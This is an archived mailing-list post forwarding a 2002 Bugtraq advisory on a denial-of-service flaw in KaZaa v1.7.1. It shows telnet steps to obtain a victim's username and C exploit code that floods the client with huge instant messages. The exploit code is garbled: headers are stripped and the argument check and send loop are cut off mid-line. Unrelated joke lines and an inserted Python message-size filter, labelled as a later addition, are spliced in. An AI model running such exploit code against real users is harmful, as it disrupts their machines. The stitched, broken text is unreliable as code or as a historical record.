
FC: Just in time for P2P-hacking bill: Disrupting KaZaa clients
2002-07-26 09:01

---------- Forwarded message ----------
Date: Fri, 26 Jul 2002 01:56:07 -0400
From: Declan McCullagh
To: politech () politechbot com
Subject: FC: Just in time for P2P-hacking bill: Disrupting KaZaa clients

Previous Politech message:
"Peer-to-peer hacking bill officially introduced in House"
http://www.politechbot.com/p-03795.html

---

From: "Richard M. Smith"
To:
Subject: Just in time for the Berman bill!
Date: Thu, 25 Jul 2002 20:46:38 -0400

FYI:

-----Original Message-----
From: josh () pulltheplug com [mailto:josh () pulltheplug com]
Sent: Thursday, July 25, 2002 1:58 AM
To: bugtraq () securityfocus com
Subject: KaZaa v1.7.1 Denial of Service Attack

Submitted by : Josh (josh () pulltheplug com), omega (mtwoar () hotmail com) on July 25th, 2002
Vulnerability : KaZaa Denial of Service Attack
Tested On : KaZaa v1.7.1
Remote : Yes
Fix : KaZaa v1.7.2 has been released and is a fix for the problem
Big Thanks To : SooT for letting me crash your system a lot.
Greets to : SooT, zen-parse, arcanum, lockdown, brian, Bryan S., #social on ptp, Jade

There exists a denial of service attack in the KaZaa Media Desktop file sharing utility that allows an attacker to force CPU usage to rise to 100% upon sending large messages to the victim. Basically it seems to have the same effect as opening an exceptionally large text file in some text editor. The added bonus is the decryption that is performed on the message, which adds to the CPU usage. Exploitation merely requires the I.P. of the victim and a username. The username can be obtained as such:

$ telnet 1214
Trying ...
Connected to .
Escape character is '^]'.
GET / HTTP/1.1                  // My input
HTTP/1.0 404 Not Found          // Server output
X-Kazaa-Username:
X-Kazaa-Network: KaZaA
X-Kazaa-IP: :1214
X-Kazaa-SupernodeIP: :1214
Connection closed by foreign host.
Assuming you and the receiving user have the bandwidth to transmit and receive the message before the connection to the user's kazaa server times out, a good proof of concept length is 20 messages at 100 iterations of the 4026-byte message tell... 300 iterations 20 times will make it pretty evident.

/* kazaa denial of service attack by Josh and omega */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define PORT 1214

int main(int argc, char *argv[])
{
    int fd, numbytes, randnum, k;
    struct hostent *host;
    struct sockaddr_in them;
    char buf2[4026];
    char buf[5000];
    char *bigboy;
    int i, size, j;

    memset(buf2, 'a', sizeof(buf2));
    buf2[sizeof(buf2)-1]='\0';
    srand(time(NULL));

    if (argc \n", argv[0]);
        exit(1);
    }

    if ((host=gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(1);
    }

    them.sin_family = AF_INET;
    them.sin_port = htons(PORT);
    them.sin_addr = *((struct in_addr *)host->h_addr);
    memset(&(them.sin_zero), '\0', 8);

    size=(4042*atoi(argv[2]))+280+1;
    bigboy=(char *)malloc(size);
    snprintf(bigboy, size,
             "GET /.message HTTP/1.1\nHost: 68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002 18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network: KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection: open\nX-Kazaa-IMTo: %s () KaZaA\nX-Kazaa-IMType: user_text\n",
             randnum, randnum, argv[3]);

    /* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */
    snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2);
    for(k=0;k

Paranoia is simply an optimistic outlook on life.
Organized people are just too lazy to look for stuff.
Killer animals zap animals again in slimey sludge.
People yack when a root evades.
While observing moths frantically try to enter a light bulb I have been able to extract and algorithm to describe their movements.
Fat people are harder to kidnap.
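A defensive counterpart to the advisory above, added here and not part of the original post or of KaZaa's own code: a small Python filter that parses a KaZaa-style instant-message request, sums the X-Kazaa-IMData payload across repeated header lines, and drops any message larger than a configurable limit. The sample requests, hosts and usernames are constructed placeholders, and the 4096-byte default limit is an assumption taken from the chunk size the advisory mentions.

```python
from typing import Dict, List, Tuple

# Constructed sample requests (not captured traffic): header names follow the
# advisory, while hosts and usernames are placeholders.
BIG_IM = (
    b"GET /.message HTTP/1.1\r\nHost: 192.0.2.10:1214\r\n"
    b"X-Kazaa-Username: sender\r\nX-Kazaa-IMTo: victim@KaZaA\r\n"
    b"X-Kazaa-IMType: user_text\r\n"
    b"X-Kazaa-IMData: " + b"a" * 9000 + b"\r\n\r\n"
)
SMALL_IM = BIG_IM.replace(b"a" * 9000, b"hello")
FILE_GET = b"GET / HTTP/1.1\r\nHost: 192.0.2.10:1214\r\n\r\n"


def parse_request(raw: bytes) -> Tuple[bytes, Dict[bytes, List[bytes]]]:
    """Split a KaZaa/HTTP-style request into (request line, headers).
    Header names are lower-cased; a repeated header keeps every value,
    which matters because a long IM may arrive as several IMData lines."""
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head = raw.split(sep, 1)[0]
    lines = [ln.rstrip(b"\r") for ln in head.split(b"\n")]
    headers: Dict[bytes, List[bytes]] = {}
    for line in lines[1:]:
        if b":" not in line:
            continue  # tolerate malformed lines instead of raising on them
        name, value = line.split(b":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def check_im_request(raw: bytes, max_im_bytes: int = 4096) -> Dict[str, object]:
    """Return a verdict: 'drop' an instant message whose total X-Kazaa-IMData
    payload exceeds max_im_bytes, 'allow' everything else."""
    request_line, headers = parse_request(raw)
    is_im = request_line.startswith(b"GET /.message") and b"x-kazaa-imtype" in headers
    if not is_im:
        return {"is_im": False, "im_bytes": 0, "verdict": "allow", "reason": "not an IM request"}
    im_bytes = sum(len(v) for v in headers.get(b"x-kazaa-imdata", []))
    if im_bytes > max_im_bytes:
        return {"is_im": True, "im_bytes": im_bytes, "verdict": "drop",
                "reason": f"IM payload of {im_bytes} bytes exceeds limit of {max_im_bytes}"}
    return {"is_im": True, "im_bytes": im_bytes, "verdict": "allow", "reason": "IM within limit"}


if __name__ == "__main__":
    for name, sample in (("BIG_IM", BIG_IM), ("SMALL_IM", SMALL_IM), ("FILE_GET", FILE_GET)):
        print(name, check_im_request(sample))
```

The same check can be applied per connection rather than per request to catch a message that is spread across many small requests from one peer.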
-------------------------------------------------------------------------
POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
This message is archived at http://www.politechbot.com/
Declan McCullagh's photographs are at http://www.mccullagh.org/
-------------------------------------------------------------------------
Like Politech? Make a donation here: http://www.politechbot.com/donate/
-------------------------------------------------------------------------

- ISN is currently hosted by Attrition.org
To unsubscribe email majordomo () attrition org with 'unsubscribe isn' in the BODY of the mail.


News URL

http://www.politechbot.com/p-03795.html